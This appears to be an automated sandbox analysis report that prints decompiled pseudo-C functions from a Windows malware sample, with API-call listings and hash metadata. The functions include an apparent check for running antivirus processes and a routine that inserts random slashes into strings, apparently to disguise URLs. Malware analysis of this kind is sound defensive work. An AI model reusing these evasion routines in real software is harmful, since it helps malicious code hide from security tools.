                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 0d7c1cb6082b48228e3696c05d2a1d2fa638be3832e3a1f9fc9186a63d971bf7
                                                          • Instruction ID: 4aec174e5c8747762bff72bac3f8cf967ee06741a4c5cb626f0a039228600848
                                                          • Opcode Fuzzy Hash: 0d7c1cb6082b48228e3696c05d2a1d2fa638be3832e3a1f9fc9186a63d971bf7
                                                          • Instruction Fuzzy Hash: A6310B71900209EFCF05EF98D8D09AE7BF9FF48354B1184AAF50697251D7309A81CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E02B911EE(signed int _a4, signed int* _a8) {
                                                          				void* __ecx;
                                                          				void* __edi;
                                                          				signed int _t6;
                                                          				intOrPtr _t8;
                                                          				intOrPtr _t12;
                                                          				short* _t19;
                                                          				void* _t25;
                                                          				signed int* _t28;
                                                          				CHAR* _t30;
                                                          				long _t31;
                                                          				intOrPtr* _t32;
                                                          
                                                          				_t6 =  *0x2b9d270; // 0xd448b889
                                                          				_t32 = _a4;
                                                          				_a4 = _t6 ^ 0x109a6410;
                                                          				_t8 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          				_t3 = _t8 + 0x2b9e87e; // 0x61636f4c
                                                          				_t25 = 0;
                                                          				_t30 = E02B938A8(_t3, 1);
                                                          				if(_t30 != 0) {
                                                          					_t25 = CreateEventA(0x2b9d2ac, 1, 0, _t30);
                                                          					E02B9A734(_t30);
                                                          				}
                                                          				_t12 =  *0x2b9d25c; // 0x4000000a
                                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02B9A65C() != 0) {
                                                          					L12:
                                                          					_t28 = _a8;
                                                          					if(_t28 != 0) {
                                                          						 *_t28 =  *_t28 | 0x00000001;
                                                          					}
                                                          					_t31 = E02B98EA1(_t32, 0);
                                                          					if(_t31 == 0 && _t25 != 0) {
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          					}
                                                          					if(_t28 != 0 && _t31 != 0) {
                                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                                          					}
                                                          					goto L20;
                                                          				} else {
                                                          					_t19 =  *0x2b9d10c( *_t32, 0x20);
                                                          					if(_t19 != 0) {
                                                          						 *_t19 = 0;
                                                          						_t19 = _t19 + 2;
                                                          					}
                                                          					_t31 = E02B9A273(0,  *_t32, _t19, 0);
                                                          					if(_t31 == 0) {
                                                          						if(_t25 == 0) {
                                                          							L22:
                                                          							return _t31;
                                                          						}
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          						if(_t31 == 0) {
                                                          							L20:
                                                          							if(_t25 != 0) {
                                                          								CloseHandle(_t25);
                                                          							}
                                                          							goto L22;
                                                          						}
                                                          					}
                                                          					goto L12;
                                                          				}
                                                          			}















                                                          APIs
                                                            • Part of subcall function 02B938A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,069B9A98,00000000,?,?,63699BC3,00000005,02B9D00C,?,?,02B95D30), ref: 02B938DE
                                                            • Part of subcall function 02B938A8: lstrcpy.KERNEL32(00000000,00000000), ref: 02B93902
                                                            • Part of subcall function 02B938A8: lstrcat.KERNEL32(00000000,00000000), ref: 02B9390A
                                                          • CreateEventA.KERNEL32(02B9D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02B93760,?,00000001,?), ref: 02B9122F
                                                            • Part of subcall function 02B9A734: HeapFree.KERNEL32(00000000,00000000,02B95637,00000000,?,?,00000000), ref: 02B9A740
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,02B93760,00000000,00000000,?,00000000,?,02B93760,?,00000001,?,?,?,?,02B952AA), ref: 02B9128F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,02B93760,?,00000001,?), ref: 02B912BD
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02B93760,?,00000001,?,?,?,?,02B952AA), ref: 02B912D5
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 73268831-0
                                                          • Opcode ID: 57b4ce630210094d1a3ab05d7cdaf4f29cbd4c4e4fce52a5aa36f2d35776733e
                                                          • Instruction ID: e729f5224f608e19d47fdec42f07b482fecb32e7e7bbf552a4d05f2429290a83
                                                          • Opcode Fuzzy Hash: 57b4ce630210094d1a3ab05d7cdaf4f29cbd4c4e4fce52a5aa36f2d35776733e
                                                          • Instruction Fuzzy Hash: 55214632A603025BCF317A6D8D44B6B73A9FB89B54F160AB5F989E7150DB20D8009E90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 38%
                                                          			E02B99242(void* __ecx, void* __esi) {
                                                          				char _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				long _v20;
                                                          				long _t34;
                                                          				long _t39;
                                                          				long _t42;
                                                          				long _t56;
                                                          				intOrPtr _t58;
                                                          				void* _t59;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          
                                                          				_t61 = __esi;
                                                          				_t59 = __ecx;
                                                          				_t60 =  *0x2b9d13c; // 0x2b9abf1
                                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                          				do {
                                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                          					_v20 = _t34;
                                                          					if(_t34 != 0) {
                                                          						L3:
                                                          						_push( &_v16);
                                                          						_push( &_v8);
                                                          						_push(_t61 + 0x2c);
                                                          						_push(0x20000013);
                                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                          						_v8 = 4;
                                                          						_v16 = 0;
                                                          						if( *_t60() == 0) {
                                                          							_t39 = GetLastError();
                                                          							_v12 = _t39;
                                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                          								L15:
                                                          								return _v12;
                                                          							} else {
                                                          								goto L11;
                                                          							}
                                                          						}
                                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                          							goto L11;
                                                          						} else {
                                                          							_v16 = 0;
                                                          							_v8 = 0;
                                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                          							_t58 = E02B9A71F(_v8 + 1);
                                                          							if(_t58 == 0) {
                                                          								_v12 = 8;
                                                          							} else {
                                                          								_push( &_v16);
                                                          								_push( &_v8);
                                                          								_push(_t58);
                                                          								_push(0x16);
                                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                          								if( *_t60() == 0) {
                                                          									E02B9A734(_t58);
                                                          									_v12 = GetLastError();
                                                          								} else {
                                                          									 *((char*)(_t58 + _v8)) = 0;
                                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                          								}
                                                          							}
                                                          							goto L15;
                                                          						}
                                                          					}
                                                          					SetEvent( *(_t61 + 0x1c));
                                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                          					_v12 = _t56;
                                                          					if(_t56 != 0) {
                                                          						goto L15;
                                                          					}
                                                          					goto L3;
                                                          					L11:
                                                          					_t42 = E02B95646( *(_t61 + 0x1c), _t59, 0xea60);
                                                          					_v12 = _t42;
                                                          				} while (_t42 == 0);
                                                          				goto L15;
                                                          			}

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 02B99259
                                                          • SetEvent.KERNEL32(?), ref: 02B99269
                                                          • GetLastError.KERNEL32 ref: 02B992F2
                                                            • Part of subcall function 02B95646: WaitForMultipleObjects.KERNEL32(00000002,02B9A8E3,00000000,02B9A8E3,?,?,?,02B9A8E3,0000EA60), ref: 02B95661
                                                            • Part of subcall function 02B9A734: HeapFree.KERNEL32(00000000,00000000,02B95637,00000000,?,?,00000000), ref: 02B9A740
                                                          • GetLastError.KERNEL32(00000000), ref: 02B99327
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: f2bc304de57c21fdc0ff024a551047de7d525dd6a5d7d99751944b372c1e60b0
                                                          • Instruction ID: 3752be6d3d0bb98aaa4b5d754e0ecead5420385e3a2f599e90592a3ebcf7160a
                                                          • Opcode Fuzzy Hash: f2bc304de57c21fdc0ff024a551047de7d525dd6a5d7d99751944b372c1e60b0
                                                          • Instruction Fuzzy Hash: 51310CB5D40709EFDF21DFA5D9849AEBBB8EB08344F5089BEE542E3140D731AA449F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 40%
                                                          			E02B936B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                          				intOrPtr _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				char _v32;
                                                          				void* __esi;
                                                          				void* _t29;
                                                          				void* _t38;
                                                          				signed int* _t39;
                                                          				void* _t40;
                                                          
                                                          				_t36 = __ecx;
                                                          				_v32 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v12 = _a4;
                                                          				_t38 = E02B93BB9(__ecx,  &_v32);
                                                          				if(_t38 != 0) {
                                                          					L12:
                                                          					_t39 = _a8;
                                                          					L13:
                                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                          						_t16 =  &(_t39[1]); // 0x5
                                                          						_t23 = _t16;
                                                          						if( *_t16 != 0) {
                                                          							E02B94F79(_t23);
                                                          						}
                                                          					}
                                                          					return _t38;
                                                          				}
                                                          				if(E02B9A2F9(0x40,  &_v16) != 0) {
                                                          					_v16 = 0;
                                                          				}
                                                          				_t40 = CreateEventA(0x2b9d2ac, 1, 0,  *0x2b9d344);
                                                          				if(_t40 != 0) {
                                                          					SetEvent(_t40);
                                                          					Sleep(0xbb8);
                                                          					CloseHandle(_t40);
                                                          				}
                                                          				_push( &_v32);
                                                          				if(_a12 == 0) {
                                                          					_t29 = E02B9A446(_t36);
                                                          				} else {
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_t29 = E02B9853F(_t36);
                                                          				}
                                                          				_t41 = _v16;
                                                          				_t38 = _t29;
                                                          				if(_v16 != 0) {
                                                          					E02B94F14(_t41);
                                                          				}
                                                          				if(_t38 != 0) {
                                                          					goto L12;
                                                          				} else {
                                                          					_t39 = _a8;
                                                          					_t38 = E02B911EE( &_v32, _t39);
                                                          					goto L13;
                                                          				}
                                                          			}

                                                          APIs
                                                          • CreateEventA.KERNEL32(02B9D2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,02B952AA,?,00000001,?), ref: 02B93702
                                                          • SetEvent.KERNEL32(00000000,?,?,?,02B952AA,?,00000001,?,00000002,?,?,02B95D5E,?), ref: 02B9370F
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,02B952AA,?,00000001,?,00000002,?,?,02B95D5E,?), ref: 02B9371A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,02B952AA,?,00000001,?,00000002,?,?,02B95D5E,?), ref: 02B93721
                                                            • Part of subcall function 02B9A446: WaitForSingleObject.KERNEL32(00000000,?,?,?,02B93741,?,02B93741,?,?,?,?,?,02B93741,?), ref: 02B9A520
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 2559942907-0
                                                          • Opcode ID: 9782f8089733c00b461bc12c86957093f597d03d8de1b2fc21b96cbc79665a7e
                                                          • Instruction ID: c5dde64aa7c3968c31c4d9123cd799a013e014a72852ae6c6b527e6fe54ad3a3
                                                          • Opcode Fuzzy Hash: 9782f8089733c00b461bc12c86957093f597d03d8de1b2fc21b96cbc79665a7e
                                                          • Instruction Fuzzy Hash: 6921A7B3D00219ABCF10BFE58985DAEB7FAEB48394F0148F5EA15E7100D7399945CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E02B917E5(unsigned int __eax, void* __ecx) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				signed int _t21;
                                                          				signed short _t23;
                                                          				char* _t27;
                                                          				void* _t29;
                                                          				void* _t30;
                                                          				unsigned int _t33;
                                                          				void* _t37;
                                                          				unsigned int _t38;
                                                          				void* _t41;
                                                          				void* _t42;
                                                          				int _t45;
                                                          				void* _t46;
                                                          
                                                          				_t42 = __eax;
                                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                          				_t38 = __eax;
                                                          				_t30 = RtlAllocateHeap( *0x2b9d238, 0, (__eax >> 3) + __eax + 1);
                                                          				_v12 = _t30;
                                                          				if(_t30 != 0) {
                                                          					_v8 = _t42;
                                                          					do {
                                                          						_t33 = 0x18;
                                                          						if(_t38 <= _t33) {
                                                          							_t33 = _t38;
                                                          						}
                                                          						_t21 =  *0x2b9d250; // 0x4ae18bb4
                                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                          						 *0x2b9d250 = _t23;
                                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                          						memcpy(_t30, _v8, _t45);
                                                          						_v8 = _v8 + _t45;
                                                          						_t27 = _t30 + _t45;
                                                          						_t38 = _t38 - _t45;
                                                          						_t46 = _t46 + 0xc;
                                                          						 *_t27 = 0x2f;
                                                          						_t13 = _t27 + 1; // 0x1
                                                          						_t30 = _t13;
                                                          					} while (_t38 > 8);
                                                          					memcpy(_t30, _v8, _t38 + 1);
                                                          				}
                                                          				return _v12;
                                                          			}

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02B91C49,00000000,?,?,02B920C2,?,069B95B0), ref: 02B917F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 02B91808
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,02B91C49,00000000,?,?,02B920C2,?,069B95B0), ref: 02B9184C
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 02B9186D
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: af886dfc90bdfbe4c6c5ad709a0d3ce19deeecec39a708f6dc73e0ca954e8fda
                                                          • Instruction ID: d9247b055959c4c92d30763038eda51bab698ce3a64eedb39b448436f4391982
                                                          • Opcode Fuzzy Hash: af886dfc90bdfbe4c6c5ad709a0d3ce19deeecec39a708f6dc73e0ca954e8fda
                                                          • Instruction Fuzzy Hash: 1D11C672E00115AFD7108B69DD84E9EBFAEDB857A0B0501B6F54497150E7709E14D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E02B9486F(char* __eax) {
                                                          				char* _t8;
                                                          				intOrPtr _t12;
                                                          				char* _t21;
                                                          				signed int _t23;
                                                          				char* _t24;
                                                          				signed int _t26;
                                                          				void* _t27;
                                                          
                                                          				_t21 = __eax;
                                                          				_push(0x20);
                                                          				_t23 = 1;
                                                          				_push(__eax);
                                                          				while(1) {
                                                          					_t8 = StrChrA();
                                                          					if(_t8 == 0) {
                                                          						break;
                                                          					}
                                                          					_t23 = _t23 + 1;
                                                          					_push(0x20);
                                                          					_push( &(_t8[1]));
                                                          				}
                                                          				_t12 = E02B9A71F(_t23 << 2);
                                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                          				if(_t12 != 0) {
                                                          					StrTrimA(_t21, 0x2b9c284);
                                                          					_t26 = 0;
                                                          					do {
                                                          						_t24 = StrChrA(_t21, 0x20);
                                                          						if(_t24 != 0) {
                                                          							 *_t24 = 0;
                                                          							_t24 =  &(_t24[1]);
                                                          							StrTrimA(_t24, 0x2b9c284);
                                                          						}
                                                          						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                          						_t26 = _t26 + 1;
                                                          						_t21 = _t24;
                                                          					} while (_t24 != 0);
                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                          				}
                                                          				return 0;
                                                          			}

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,069B95AC,?,02B95D25,?,02B9243F,069B95AC,?,02B95D25), ref: 02B94889
                                                          • StrTrimA.SHLWAPI(?,02B9C284,00000002,?,02B95D25,?,02B9243F,069B95AC,?,02B95D25), ref: 02B948A8
                                                          • StrChrA.SHLWAPI(?,00000020,?,02B95D25,?,02B9243F,069B95AC,?,02B95D25), ref: 02B948B3
                                                          • StrTrimA.SHLWAPI(00000001,02B9C284,?,02B95D25,?,02B9243F,069B95AC,?,02B95D25), ref: 02B948C5
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID:
                                                          • API String ID: 3043112668-0
                                                          • Opcode ID: d3a610a70d4ff76458b673cdb937afae2d267888ffb1acbf5f383cc7794efb8a
                                                          • Instruction ID: 235e02da5c1b18761ad702447005ed8545cb6bf98a5b66a53314d1c5616f42c4
                                                          • Opcode Fuzzy Hash: d3a610a70d4ff76458b673cdb937afae2d267888ffb1acbf5f383cc7794efb8a
                                                          • Instruction Fuzzy Hash: 0B01DD71A453A25FD6219F66CC89F277FACFB46A94F110969F542C7340DB60D80285B4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E02B9A65C() {
                                                          				char _v264;
                                                          				void* _v300;
                                                          				int _t8;
                                                          				intOrPtr _t9;
                                                          				int _t15;
                                                          				void* _t17;
                                                          
                                                          				_t15 = 0;
                                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                          				if(_t17 != 0) {
                                                          					_t8 = Process32First(_t17,  &_v300);
                                                          					while(_t8 != 0) {
                                                          						_t9 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          						_t2 = _t9 + 0x2b9ee34; // 0x73617661
                                                          						_push( &_v264);
                                                          						if( *0x2b9d0fc() != 0) {
                                                          							_t15 = 1;
                                                          						} else {
                                                          							_t8 = Process32Next(_t17,  &_v300);
                                                          							continue;
                                                          						}
                                                          						L7:
                                                          						CloseHandle(_t17);
                                                          						goto L8;
                                                          					}
                                                          					goto L7;
                                                          				}
                                                          				L8:
                                                          				return _t15;
                                                          			}










                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02B9A66C
                                                          • Process32First.KERNEL32(00000000,?), ref: 02B9A67F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 02B9A6AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 02B9A6BA
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: c0be49824b0f28f90193807a2bd5459d5f5b8f48285ddb23a740badd381a42a7
                                                          • Instruction ID: 1494955207eddc181f36789882197a23232fd8ac76c44cd978d59c973232554b
                                                          • Opcode Fuzzy Hash: c0be49824b0f28f90193807a2bd5459d5f5b8f48285ddb23a740badd381a42a7
                                                          • Instruction Fuzzy Hash: 73F0B4366011256BDF20FBBB9D49EEB7BADDBC5350F0101F2E909C3240EB20CA558AA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E02B96840(void* __esi) {
                                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                                          				void* _t8;
                                                          				void* _t10;
                                                          
                                                          				_v4 = 0;
                                                          				memset(__esi, 0, 0x38);
                                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                                          				 *(__esi + 0x1c) = _t8;
                                                          				if(_t8 != 0) {
                                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                                          					 *(__esi + 0x20) = _t10;
                                                          					if(_t10 == 0) {
                                                          						CloseHandle( *(__esi + 0x1c));
                                                          					} else {
                                                          						_v4 = 1;
                                                          					}
                                                          				}
                                                          				return _v4;
                                                          			}







                                                          APIs
                                                          • memset.NTDLL ref: 02B9684E
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 02B96863
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 02B96870
                                                          • CloseHandle.KERNEL32(?), ref: 02B96882
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: b27d98668579dae1ca0f0c0beb056ce9f6d81323c3970804a9ccb5a5eb63a2e7
                                                          • Instruction ID: 8510774f9d3bb283f874ec59316a6a3523cb6abe0c12dea3f3b8f396956e2e30
                                                          • Opcode Fuzzy Hash: b27d98668579dae1ca0f0c0beb056ce9f6d81323c3970804a9ccb5a5eb63a2e7
                                                          • Instruction Fuzzy Hash: EBF05EF15443087FD7206F26DCC4C27BBACEB9529DB114A7EF14282111D672A8198E60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E02B923F4(void** __esi) {
                                                          				char* _v0;
                                                          				intOrPtr _t4;
                                                          				intOrPtr _t6;
                                                          				void* _t8;
                                                          				intOrPtr _t11;
                                                          				void* _t12;
                                                          				void** _t14;
                                                          
                                                          				_t14 = __esi;
                                                          				_t4 =  *0x2b9d32c; // 0x69b95b0
                                                          				__imp__(_t4 + 0x40);
                                                          				while(1) {
                                                          					_t6 =  *0x2b9d32c; // 0x69b95b0
                                                          					_t1 = _t6 + 0x58; // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t8 =  *_t14;
                                                          				if(_t8 != 0 && _t8 != 0x2b9d030) {
                                                          					HeapFree( *0x2b9d238, 0, _t8);
                                                          				}
                                                          				_t14[1] = E02B9486F(_v0, _t14);
                                                          				_t11 =  *0x2b9d32c; // 0x69b95b0
                                                          				_t12 = _t11 + 0x40;
                                                          				__imp__(_t12);
                                                          				return _t12;
                                                          			}











                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(069B9570), ref: 02B923FD
                                                          • Sleep.KERNEL32(0000000A,?,02B95D25), ref: 02B92407
                                                          • HeapFree.KERNEL32(00000000,00000000,?,02B95D25), ref: 02B9242F
                                                          • RtlLeaveCriticalSection.NTDLL(069B9570), ref: 02B9244B
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: eebaad57670dd6c904f99b3a192c99374797fd05fcb75cc0bda26f17c910ec5d
                                                          • Instruction ID: fef4f23f4f1c7f97555c2a59b93daab2353b623d5feb510cd46c0370596f65b8
                                                          • Opcode Fuzzy Hash: eebaad57670dd6c904f99b3a192c99374797fd05fcb75cc0bda26f17c910ec5d
                                                          • Instruction Fuzzy Hash: 91F0FE71E84141ABDB14AF79DB48F167BE4EF1D781F04C855FA41C7250C720E861CB25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E02B91B42() {
                                                          				void* _t1;
                                                          				intOrPtr _t5;
                                                          				void* _t6;
                                                          				void* _t7;
                                                          				void* _t11;
                                                          
                                                          				_t1 =  *0x2b9d26c; // 0x2e0
                                                          				if(_t1 == 0) {
                                                          					L8:
                                                          					return 0;
                                                          				}
                                                          				SetEvent(_t1);
                                                          				_t11 = 0x7fffffff;
                                                          				while(1) {
                                                          					SleepEx(0x64, 1);
                                                          					_t5 =  *0x2b9d2bc; // 0x0
                                                          					if(_t5 == 0) {
                                                          						break;
                                                          					}
                                                          					_t11 = _t11 - 0x64;
                                                          					if(_t11 > 0) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				_t6 =  *0x2b9d26c; // 0x2e0
                                                          				if(_t6 != 0) {
                                                          					CloseHandle(_t6);
                                                          				}
                                                          				_t7 =  *0x2b9d238; // 0x65c0000
                                                          				if(_t7 != 0) {
                                                          					HeapDestroy(_t7);
                                                          				}
                                                          				goto L8;
                                                          			}









                                                          APIs
                                                          • SetEvent.KERNEL32(000002E0,00000001,02B94F0E), ref: 02B91B4D
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 02B91B5C
                                                          • CloseHandle.KERNEL32(000002E0), ref: 02B91B7D
                                                          • HeapDestroy.KERNEL32(065C0000), ref: 02B91B8D
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: abd60e90540ec9d801bdeb75c4aed127cbaae611e9120641fb7073124a9d3554
                                                          • Instruction ID: e1cc98cfc536b103cece264cb0f0b8c52b1d9ca75449dea6dcd28969e9835d19
                                                          • Opcode Fuzzy Hash: abd60e90540ec9d801bdeb75c4aed127cbaae611e9120641fb7073124a9d3554
